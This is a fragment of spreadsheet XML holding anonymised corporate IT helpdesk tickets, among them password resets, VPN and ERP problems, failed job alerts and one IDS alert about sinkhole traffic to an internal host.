when i try to create a delivery (pweaver/ship) the printout of shipament lable is not working. for the italian shipmet works.. for others countries, is not working. can you please give me support?</t>
  </si>
  <si>
    <t>dmqjhrso gzbunwie</t>
  </si>
  <si>
    <t>no response from other side.</t>
  </si>
  <si>
    <t>follow up call : inplant_859346</t>
  </si>
  <si>
    <t>wifi in r&amp;d conference room</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gdkiehbr.kdithjsr@gmail.com_x000D_
_x000D_
please investigate and repair the cause of the weak wifi signal in the r&amp;d area. we used to have full bars and for some reason it is barley 2 bars._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">dual monitor issue </t>
  </si>
  <si>
    <t>dual monitor issue</t>
  </si>
  <si>
    <t>myzprshf ojvgdcwb</t>
  </si>
  <si>
    <t>need interaction password reset</t>
  </si>
  <si>
    <t xml:space="preserve">need interaction password reset
phone: </t>
  </si>
  <si>
    <t>password_management_tool password manager : password reset help and query</t>
  </si>
  <si>
    <t>xjyuobma pzgqixlj</t>
  </si>
  <si>
    <t>bei drucker em98 papiertransport defekt</t>
  </si>
  <si>
    <t xml:space="preserve">beim transport des druckerpapiers treten in regelmÃ¤ÃŸigen abstÃ¤nden einkerbungen auf. papiereinzug defekt? </t>
  </si>
  <si>
    <t>tczxaubk aupnwqoi</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log in to the mii system </t>
  </si>
  <si>
    <t>unable to log in to the mii system _x000D_
_x000D_
user authentication failed</t>
  </si>
  <si>
    <t>gcdptqae angojbil</t>
  </si>
  <si>
    <t>i.t. issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zwirhcol.narzlmfw@gmail.com
usa has no functioning ups systems.  all switches/servers are plugged into the wall.  please ship two aerp.
j. shrugott tyhuellis
usa facilities mgr.
zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;
</t>
  </si>
  <si>
    <t>reset passwords for robhyertyj f duca using password_management_tool password reset.</t>
  </si>
  <si>
    <t>acteiqdu bferalus</t>
  </si>
  <si>
    <t>missing data in bex productmanagement - urgent !!!!!!!!!!!!!!!!!!!!!!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uwofavej.hxyatnjc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
data are dierppearing in bex from productmanagement master._x000D_
_x000D_
we found the reason: anybody has changed the key figure name from "sales revenue" to "total sales revenue"._x000D_
in addition, there is a new key figure: net value_x000D_
_x000D_
nobody is informed about the change and the different (?)  content of the two key figures._x000D_
_x000D_
you immediately need to change back, all the reports wonÂ´t work now_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>pschzfog hbzvkqjd</t>
  </si>
  <si>
    <t>outlook issue.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iqmhjlwr.jqmxaybi@gmail.com_x000D_
_x000D_
hello guys,_x000D_
_x000D_
please can you help, i was advised to change passwords on password_management_tool manager and since i have done this i have had a delay on my e-mails as per the below screenshot._x000D_
_x000D_
[cid:image001.jpg@01d20cff.209d01c0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>iqmhjlwr jqmxaybi</t>
  </si>
  <si>
    <t>active directory locked.</t>
  </si>
  <si>
    <t>mobile device activated.</t>
  </si>
  <si>
    <t xml:space="preserve">in correct tax    rate  in inwarehouse_tools </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ikerxqwz.prkyuitl@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
after implementation  of updation  of tax  rate   through system   , we have come across  instances wherein the system is capturing  different   tax rate  for local  sales  (within karnataka)  other than one  recommended ._x000D_
_x000D_
in this connection attaching herewith    mail communication from   team ._x000D_
_x000D_
request you to look into this  aspect  as it is resulting into non-compliance_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>contractor locked out: please unlock vvlahstyurr in ad and erp SID_60</t>
  </si>
  <si>
    <t>a student  is working on a project with vinhytry, and has reported that her passwords are no longer working to access data.  my assumption is that she got her passwords mixed up between ad and hana SID_60, and is locked out of one or both; please have a look at unlocking her account.</t>
  </si>
  <si>
    <t>need to log into skype for business</t>
  </si>
  <si>
    <t>cannot access skype for business with my login credentials.</t>
  </si>
  <si>
    <t>jslqdgka clfrodny</t>
  </si>
  <si>
    <t>erp crm - instatnt timeout</t>
  </si>
  <si>
    <t xml:space="preserve">user: fywphaxc.jacdqbks@gmail.com;_x000D_
issue: user's session instantly kirtyled - timeout error as per attached screen._x000D_
</t>
  </si>
  <si>
    <t>fywphaxc jacdqbks</t>
  </si>
  <si>
    <t>access to vpn</t>
  </si>
  <si>
    <t>added user to the f5 employee group. ryafbthn will uacyltoe hxgaycze and call in if he has any issues.</t>
  </si>
  <si>
    <t>yalntgcz vaqjknsw</t>
  </si>
  <si>
    <t>passwÃ¶rter wothyehre</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dgwrmsja.jzlpwuit@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
bitte fÃ¼r wothyehre die passwÃ¶rter fÃ¼r windows und erp freimachen!_x000D_
_x000D_
danke_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen/best </t>
  </si>
  <si>
    <t>computer doesn't work</t>
  </si>
  <si>
    <t>computer starts, but keybankrd and mouse don't work. impossible login. cables and connections ok (keybankrd and mouse lights on).</t>
  </si>
  <si>
    <t>fegahzqx bkeqfvpl</t>
  </si>
  <si>
    <t>bobj explorer info spaces load issue (email sent to basis and dac team)</t>
  </si>
  <si>
    <t xml:space="preserve">hi team basis, team dac,_x000D_
_x000D_
please investigate the bobj explorer services are up and running. it is showing blank screen at the moment._x000D_
_x000D_
i have re indexed all the information spaces. but it did not help._x000D_
_x000D_
please assist at an earliest._x000D_
_x000D_
i will create a ticket in few minutes and update here._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>sholvcmf bjtpomrl</t>
  </si>
  <si>
    <t>unhweist ednkuigf</t>
  </si>
  <si>
    <t>zpsoifea wvhilrpz</t>
  </si>
  <si>
    <t>erp issue with batches</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bswlorek.yhdrlgbs@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
erp does not create to's automatically because of the following error message:_x000D_
[cid:image001.png@01d20cf1.36053bd0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>when entering the proven solution ps-16-939 under "the page cannot be foun</t>
  </si>
  <si>
    <t xml:space="preserve">would you please delete the solution so that i can upload it again? </t>
  </si>
  <si>
    <t>kxoezpwm wthpabcq</t>
  </si>
  <si>
    <t>bitte konten  erzeugen</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ughzilfm.cfibdamq@gmail.com_x000D_
_x000D_
hallo ,_x000D_
_x000D_
bitte k1 konten  erzeugen ._x000D_
_x000D_
referenz  user : twdyzsfr gjedmfvh_x000D_
_x000D_
auftraggeber : scedxqur pocxqtrl_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>scedxqur pocxqtrl</t>
  </si>
  <si>
    <t>hzptilsw wusdajqv : log on balancing error for SID_1 and SID_21</t>
  </si>
  <si>
    <t xml:space="preserve">lhbsm005: disk free on f:\ is now 3 % which is below warning threshold of 15%. </t>
  </si>
  <si>
    <t>bitte die schreib / leseberechtigung  fÃ¼r ordner m:staebefertigung einrichten.</t>
  </si>
  <si>
    <t xml:space="preserve">guten morgen,_x000D_
_x000D_
bitte die schreib / leseberechtigung  fÃ¼r ordner m:staebefertigung einrichten._x000D_
_x000D_
danke_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
freundliche grÃ¼ÃŸe / kind </t>
  </si>
  <si>
    <t>revert the change done for chg0032720</t>
  </si>
  <si>
    <t>revert the change done for chg1143831 please find the attachment for the issue that users are facing.</t>
  </si>
  <si>
    <t>search and explorer analytics issue</t>
  </si>
  <si>
    <t xml:space="preserve">search and explorer analytics issue is blank in bobj. can login to search and analytics from ess but no search list is available.
phone: </t>
  </si>
  <si>
    <t>fbuacglh nvreldkt</t>
  </si>
  <si>
    <t>tess application doesn't run</t>
  </si>
  <si>
    <t xml:space="preserve">good morning, when i double click on the tess icon on my desktop, starts the initial loading page, but after few seconds the application close itself and the programdnty doesn't run. many </t>
  </si>
  <si>
    <t>GRP_66</t>
  </si>
  <si>
    <t>izohnpaq jtolembh</t>
  </si>
  <si>
    <t xml:space="preserve">bobj </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ctzykflo.evzbhgru@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
can someone please check and fix the problem._x000D_
_x000D_
sales reps reported that the reports are not available in bobj._x000D_
_x000D_
i checked too and also get the error message._x000D_
_x000D_
[cid:image001.jpg@01d20ce6.35220981]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>good day._x000D_
_x000D_
please unlock users windows account.</t>
  </si>
  <si>
    <t>oslzvpgk nhwsxgpb</t>
  </si>
  <si>
    <t>local availability and pricing information missing on various "obsolete" products (see screenshot)</t>
  </si>
  <si>
    <t>unable to turn on the computer.</t>
  </si>
  <si>
    <t>voprdmae ivrgdmao</t>
  </si>
  <si>
    <t>po display by vendor - not proper</t>
  </si>
  <si>
    <t>po display by vendor is showing only pending po's._x000D_
if selection paramdntyeter is selected as we101 -  it was showing only pending po;s_x000D_
if selection paramdntyeter is kept as blank - it was showing complete po's done on that vendor.</t>
  </si>
  <si>
    <t>mnrgpfqh mblavfti</t>
  </si>
  <si>
    <t>HostName_1178 is not responding since at 1:30 am et on 09/12</t>
  </si>
  <si>
    <t>please add new user to company ru and nm - nghyuakm</t>
  </si>
  <si>
    <t xml:space="preserve">please add new user to company ru and nm - nghyuakm
install phone and headset as well.
</t>
  </si>
  <si>
    <t>esguiazn pqdjtzin</t>
  </si>
  <si>
    <t>aqzcisjy raflghneib : account disabled.</t>
  </si>
  <si>
    <t>password reset collaboration_platform problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sbgvrncj.idfhtoqv@gmail.com_x000D_
_x000D_
hello,_x000D_
i changed my passwords this morning with password manager but i am having problems synching my collaboration_platform on collaboration_platform, it keeps asking me to enter the new password again and again._x000D_
the rest, including office365 on both the workstation and the mobile are working ok with the new password. just collaboration_platform is having a problem._x000D_
any suggestions?_x000D_
_x000D_
[cid:image001.png@01d20cde.40cc4e90]_x000D_
many </t>
  </si>
  <si>
    <t>unable to take prints &amp; scan with new laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dwujlnhs.ecxvrpyl@gmail.com_x000D_
_x000D_
dear sir_x000D_
_x000D_
i have received new laptop dell latitude e5470, with which i am unable to take printouts and scan from office printer._x000D_
kindly help in resolving the issue._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>dwujlnhs ecxvrpyl</t>
  </si>
  <si>
    <t>help reset erp SID_37 bw production account password --xighjacj.</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_37 bw production account password  changed failed in password_management_tool system . erp bex can not login now ._x000D_
user id : xighjacj_x000D_
_x000D_
received from: smktofel.etsoirbw@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please help on my issue below._x000D_
[cid:image001.png@01d20d0a.f4495281]_x000D_
_x000D_
[cid:image002.png@01d20d0a.f4495281]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>smktofel etsoirbw</t>
  </si>
  <si>
    <t>error druing password change.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fjnmxoya.iljgptas@gmail.com_x000D_
_x000D_
hi i got the below message during password change. kindly help._x000D_
_x000D_
[cid:2989156a-79bb-43c1-96e5-47e5ee747c69]_x000D_
_x000D_
 with </t>
  </si>
  <si>
    <t>fjnmxoya iljgptas</t>
  </si>
  <si>
    <t>ooo - till 4 oct 2016 it problem - engineering tool offline version is not starting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mikhghytr.sperhake@company.com_x000D_
_x000D_
win7 64bit_x000D_
dell m4700_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_481 failed in job_scheduler at: 09/12/2016 03:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
9/12/2016 1:03:21 am :: error: vm 'HostName_1045' (ref: 'vm-232341') is 'disconnected' _x000D_
_x000D_
job Job_481 failed in job_scheduler at: 09/12/2016 03:46:00</t>
  </si>
  <si>
    <t>der rechner von unseren schichtfÃ¼hrern h.gabryltk, h.byczkowski, h.stankewitz ist defekt.</t>
  </si>
  <si>
    <t xml:space="preserve">hallo _x000D_
_x000D_
der rechner von unseren schichtfÃ¼hrern h.gabryltk, h.byczkowski, h.stankewitz ist defekt._x000D_
kannst du bitte mal vorbeikommen._x000D_
</t>
  </si>
  <si>
    <t>rechner fÃ¼r messvorrichtung steli funktioniert nicht \zedlet</t>
  </si>
  <si>
    <t>probleme mit accespoint \konferenzraum f&amp;e \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>probleme mit Ã¶ffnen m:\wsb_exe \we_wu102 \pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>qrstgxwn fhpyxgjz</t>
  </si>
  <si>
    <t>datenlogger opus20 thip q475024 kann keine verbindung herstellen</t>
  </si>
  <si>
    <t>datenlogger opus20 thip q475024, wird zur Ã¼berwachung der raumtemperatur benÃ¶tigt, findet nach der externen wartung keine netzwerkverbindung zum pc der pmÃ¼</t>
  </si>
  <si>
    <t>remote vpn issue</t>
  </si>
  <si>
    <t>i cannot connect to remote vpn using either of the links below (_x000D_
probably it has something to do with emea upgrade activity that took place on september 9._x000D_
please fix the problem so that i can connect to vpn.</t>
  </si>
  <si>
    <t>dpurliet ujlmdfac</t>
  </si>
  <si>
    <t>requirement of internet access for machine pc - eorjylzm vrkofesj at pu6</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dfiyvmec.wxioadpt@gmail.com
machine details :   ip address 172.16.0.100
subnet mask      :  
physical address: 00-07-3256-14-2e-a8
host name :  mc350
service engg from the machine supplier from switzerland is with us for a training programdntyme.
we need the  internet access in the machine  for a week
request your immediate support
kuhgtyjvelu. u
manager â€“ reliability engineering
dfiyvmec.wxioadpt@gmail.com&lt;mailto:dfiyvmec.wxioadpt@gmail.com&gt;
</t>
  </si>
  <si>
    <t>dfiyvmec wxioadpt</t>
  </si>
  <si>
    <t>can not create inventory list</t>
  </si>
  <si>
    <t xml:space="preserve">forwarded request to the rqfhiong zkwfqagb dl, copying tomoe._x000D_
_x000D_
email:_x000D_
from: zsqabokr xbtsaodr _x000D_
sent: monday, september 12, 2016 3:30 pm_x000D_
to: 'nwfodmhc exurcwkm'_x000D_
subject: can not create inventory list_x000D_
_x000D_
help desk,_x000D_
_x000D_
about the quantity of mm no.6370759, we want to change from zero._x000D_
_x000D_
please find the attached document._x000D_
we have problems._x000D_
â‘  the inventory list cannot show by mb52._x000D_
â‘¡ the inventory list cannot create by mi31._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>è½¬å‘: ä»¥è‰²åˆ—ä¿®ç£¨/rma6001502596</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear teamï¼Œ
we need to cancel sto#5019103390,pls. help to reverse its inwarehouse_tool markhtyed in red,thx!
[cid:image001.png@01d20d06.437cc160]
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t>account for aqzcisjy raflghneib, vvdghtteij, is locked. please unlock.</t>
  </si>
  <si>
    <t>password expires in 4 days</t>
  </si>
  <si>
    <t xml:space="preserve">dear all, my password runs out in 4 days, i am travelling and have no chance to come into the company network,please extend my current password until the 21st of september </t>
  </si>
  <si>
    <t xml:space="preserve">unable to set skype meeting in outlook </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1332 failed in job_scheduler at: 09/12/2016 02:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1332 failed in job_scheduler at: 09/12/2016 02:16:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 09/12/2016 02:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 09/12/2016 02:14:00</t>
  </si>
  <si>
    <t>there isn't any price under customer pruchase order 24899738</t>
  </si>
  <si>
    <t xml:space="preserve">the customer group 3 of customer 81504358 has been defigned as cn7, and i was told price of the 4 products ( mm#  2869194, 2936676, 4232294, 5174961) have been maitained in system, but the order 35900849 isn't with any price on it. please check and let me know what's wrong in system for it. the customer is in urgnet need of the order , please solve the problem for us aerp._x000D_
please find the detail from the attached._x000D_
</t>
  </si>
  <si>
    <t>security incidents - (  #in33847938) : possible malware infection - traffic from sinkhole domain to apul7701066</t>
  </si>
  <si>
    <t>source ip :195.22.28.222_x000D_
source port: 80_x000D_
source ip geolocation: lisbon, prt_x000D_
destination ip: 10.44.22.248_x000D_
destination hostname: apul8812177 _x000D_
destination port: 58300_x000D_
user  name:xcirqlup zopbiufn_x000D_
location :/asiapac/apac/apacpuchn/computers/apul8812177_x000D_
sep , sms status :not updated_x000D_
field sales user ( yes / no) :  no_x000D_
dsw event log:see below_x000D_
-----------------------------------------------------------------------------------------------------------_x000D_
_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 93002683_x000D_
event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000D_
occurrence count: 2_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 195.22.28.222_x000D_
source port: 80_x000D_
source ip geolocation: lisbon, prt_x000D_
destination ip: 10.44.22.248_x000D_
destination hostname: apul8812177 _x000D_
destination port: 58300_x000D_
connection directionality: incoming_x000D_
protocol: tcp_x000D_
http status code: 302_x000D_
_x000D_
device information_x000D_
device ip: 80.68.49.4169_x000D_
device name: isensor05.company.com_x000D_
log time: 2016-09-12 at 04:37:39 utc_x000D_
action: not blocked_x000D_
vendor eventid: 703_x000D_
cvss score: -1 _x000D_
vendor priority: 2_x000D_
vendor version: 7_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 699417_x000D_
inspector event id: 888388110_x000D_
ontology id: 200020003203755736_x000D_
event type id: 200020003203582148_x000D_
agent id: 102835_x000D_
_x000D_
event detail:_x000D_
[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000D_
[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 606873][event id: 703][time: 2584766160.739356]_x000D_
[src ip: 195.22.28.222][dst ip: 10.44.22.248][sport/itype: 80][dport/icode: 58300][proto: 6]_x000D_
09/12/2016-04:37:39.739356 195.22.28.222:80 -&gt; 10.44.22.248:58300_x000D_
tcp ttl:43 tos:0x0 id:22582 iplen:20 dgmlen:391 df_x000D_
***ap*** seq: 0x501aa6d0 ack: 0x74888c9e win: 0x68b0 tcplen: 20_x000D_
==pcap 1==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /domain/newflv.sohu.ccgslb.net]_x000D_
_x000D_
[ex http_hostname 10: sso.anbtr.com]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
.....1.w.h..........e...x6@.+..".....,...p..p...t...p.h..$..http/1.1.302.moved.temporarily..server:.nginx..date:.mon,.12.sep.2016.04:37:39.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=0a51a90cb840cc144b448e76579f6b84;.domain=.ccgslb.net..location:._x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000 0c00 0000 1331 d657 1c48 0b00 8701 0000 .....1.w.h......_x000D_
000010 8701 0000 4500 0187 5836 4000 2b06 f522 ....e...x6@.+.."_x000D_
000020 c316 1cde 0a2c 16f8 0050 e3bc 501a a6d0 .....,...p..p..._x000D_
000030 7488 8c9e 5018 68b0 0a24 0000 4854 5450 t...p.h..$..http_x000D_
000040 2f31 2e31 2033 3032 204d 6f76 6564 2054 /1.1.302.moved.t_x000D_
000050 656d 706f 7261 7269 6c79 0d0a 5365 7276 emporarily..serv_x000D_
000060 6572 3a20 6e67 696e 780d 0a44 6174 653a er:.nginx..date:_x000D_
000070 204d 6f6e 2c20 3132 2053 6570 2032 3031 .mon,.12.sep.201_x000D_
000080 3620 3034 3a33 373a 3339 2047 4d54 0d0a 6.04:37:39.gmt.._x000D_
000090 436f 6e74 656e 742d 5479 7065 3a20 7465 content-type:.te_x000D_
0000a0 7874 2f68 746d 6c0d 0a43 6f6e 6e65 6374 xt/html..connect_x000D_
0000b0 696f 6e3a 2063 6c6f 7365 0d0a 5365 742d ion:.close..set-_x000D_
0000c0 436f 6f6b 6965 3a20 616e 6274 723d 3061 cookie:.anbtr=0a_x000D_
0000d0 3531 6139 3063 6238 3430 6363 3134 3462 51a90cb840cc144b_x000D_
0000e0 3434 3865 3736 3537 3966 3662 3834 3b20 448e76579f6b84;._x000D_
0000f0 646f 6SID_26 696e 3d2e 6363 6773 6c62 2e6e domain=.ccgslb.n_x000D_
000100 6574 0d0a 4c6f 6361 7469 6f6e 3a20 6874 et..location:.ht_x000D_
000110 7470 3a2f 2f78 7373 6f2e 6e65 7766 6c76 tp://xsso.newflv_x000D_
000120 2e73 6f68 752e 6363 6773 6c62 2e6e 6574 .sohu.ccgslb.net_x000D_
000130 2f30 6135 3161 3930 6362 3834 3063 6331 /0a51a90cb840cc1_x000D_
000140 3434 6234 3438 6537 3635 3739 6636 6238 44b448e76579f6b8_x000D_
000150 340d 0a0d 0a47 6f20 6874 7470 3a2f 2f78 4....go._x000D_
000160 7373 6f2e 6e65 7766 6c76 2e73 6f68 752e sso.newflv.sohu._x000D_
000170 6363 6773 6c62 2e6e 6574 2f30 6135 3161 ccgslb.net/0a51a_x000D_
000180 3930 6362 3834 3063 6331 3434 6234 3438 90cb840cc144b448_x000D_
000190 6537 3635 3739 6636 6238 34 e76579f6b84_x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>apac apac - china company-ap-chn-china-3750g-access-vmsw01 and multiple servers went down at 1:55 am et on 09/12</t>
  </si>
  <si>
    <t>job name:</t>
  </si>
  <si>
    <t>unable to open .jpg , .png files</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pxbqkfgm.qexvrmcn@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am unable to open .jpg &amp; .png files. pls. do the needful._x000D_
_x000D_
vivthyek byuihand_x000D_
asst manager- sales_x000D_
company india ltd, india._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>how to recall send message in outlook</t>
  </si>
  <si>
    <t>iwqhcmok ovxygicj</t>
  </si>
  <si>
    <t>reset the password for mobaidfx gviwlsrm on erp / produktion / hcm</t>
  </si>
  <si>
    <t xml:space="preserve">passwort zurÃ¼cksetzen - </t>
  </si>
  <si>
    <t>handscanner am rÃ¼ckmeldeterminal 6 defekt</t>
  </si>
  <si>
    <t>handscanner am rÃ¼ckmeldeterminal 6 defekt (gegenÃ¼ber kln)</t>
  </si>
  <si>
    <t>mhvbnqri sacvgzxf</t>
  </si>
  <si>
    <t xml:space="preserve">netweaver </t>
  </si>
  <si>
    <t xml:space="preserve">folgender fehler: microsoft .net framdntyework 4,5 is not installed._x000D_
please contact your administrator. </t>
  </si>
  <si>
    <t>ogfjbrlw nwakldmx</t>
  </si>
  <si>
    <t>company engineering_tool access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: mcphgvnb.bdegqtyj@gmail.com
hello,
        please help me to access the company engineering_tool, tool data system and crm.   company engineering_tool is asking email and password to open and tried it with my email (mcphgvnb.bdegqtyj@gmail.com&lt;mailto:mcphgvnb.bdegqtyj@gmail.com&gt;) &amp; password but it is showing incorrect id &amp; password so please do needful
thanking you
       ramdntygy
</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to engineering tool </t>
  </si>
  <si>
    <t>can not log into vpn</t>
  </si>
  <si>
    <t xml:space="preserve">
name:gwptzvxm rhozsfty
language:
browser:microsoft internet explorer
email:gwptzvxm.rhozsfty@gmail.com
customer number:
telephone:
summary:can not log into vpn</t>
  </si>
  <si>
    <t>gwptzvxm rhozsfty</t>
  </si>
  <si>
    <t>sorahdyggs (ijyuvind sohytganvi ) his system is locked and he is not able to log in</t>
  </si>
  <si>
    <t>_x000D_
name:pradtheyp_x000D_
language:_x000D_
browser:microsoft internet explorer_x000D_
email:pradtheyp.jeyabalan@gmail.com_x000D_
customer number:_x000D_
telephone:0649737471_x000D_
summary:sorahdyggs (ijyuvind sohytganvi ) his system is locked and he is not able to log in</t>
  </si>
  <si>
    <t>pvuyszkd mqxdtubl</t>
  </si>
  <si>
    <t>t/o can not be generated</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
the t/o can not be generated for below dn, would you pls help to check , </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1141 failed in job_scheduler at: 09/11/2016 23:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1141 failed in job_scheduler at: 09/11/2016 23:45:00</t>
  </si>
  <si>
    <t>xckbimhl ymejrugf</t>
  </si>
  <si>
    <t>retrieving data from old to new laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jkpwisnf.lgpdyncm@gmail.com_x000D_
_x000D_
hello_x000D_
i forgot the password of old laptop and i have to submit the same to india office._x000D_
before doing that, i want to transfer some data especially engineering_tools._x000D_
could you please help me in resolving the issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 09/11/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 09/11/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 09/11/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 09/11/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 09/11/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 09/11/2016 23:00:00</t>
  </si>
  <si>
    <t>battery at warning status</t>
  </si>
  <si>
    <t xml:space="preserve">battery showing warning status </t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to vpn vpn </t>
  </si>
  <si>
    <t>unlock erp logon</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jofvunqs.uwigjmzv@gmail.com_x000D_
_x000D_
hello:_x000D_
please help me unlock erp logon.  i can not logon the erp system ,input my password._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>security_tool password manager service down in component server lhqsm657</t>
  </si>
  <si>
    <t>lhqsm657: security_tool application is down. _x000D_
component name security_tool password manager is down</t>
  </si>
  <si>
    <t>HostName_986:(plm conversion-  production) alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, ex</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_986:(plm conversion-  production):  alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, </t>
  </si>
  <si>
    <t xml:space="preserve">HostName_53 : 85% space consumed. space available: 0.98 m </t>
  </si>
  <si>
    <t xml:space="preserve">HostName_53: volume: f:\ label:dat2-HostName_53 d4e35b72 on server: HostName_53 is over _x000D_
85% space consumed. space available: 0.98 m </t>
  </si>
  <si>
    <t xml:space="preserve">lhbsm005 : 85% disk space consumed. space available: 4.5 g </t>
  </si>
  <si>
    <t xml:space="preserve">lhbsm005: volume: f:\ label:dat2-lhbsm005 7446ecc9 on server: lhbsm005 is over _x000D_
85% space consumed. space available: 4.5 g </t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_6_regen failed in job_scheduler at: 09/11/2016 17:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_6_regen failed in job_scheduler at: 09/11/2016 17:48:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_5_regen failed in job_scheduler at: 09/11/2016 17:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_5_regen failed in job_scheduler at: 09/11/2016 17:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hoti failed in job_scheduler at: 09/11/2016 14:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hoti failed in job_scheduler at: 09/11/2016 14:46:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1427 failed in job_scheduler at: 09/11/2016 14:44:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1427 failed in job_scheduler at: 09/11/2016 14:44:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hoti failed in job_scheduler at: 09/11/2016 14:21:00  </t>
  </si>
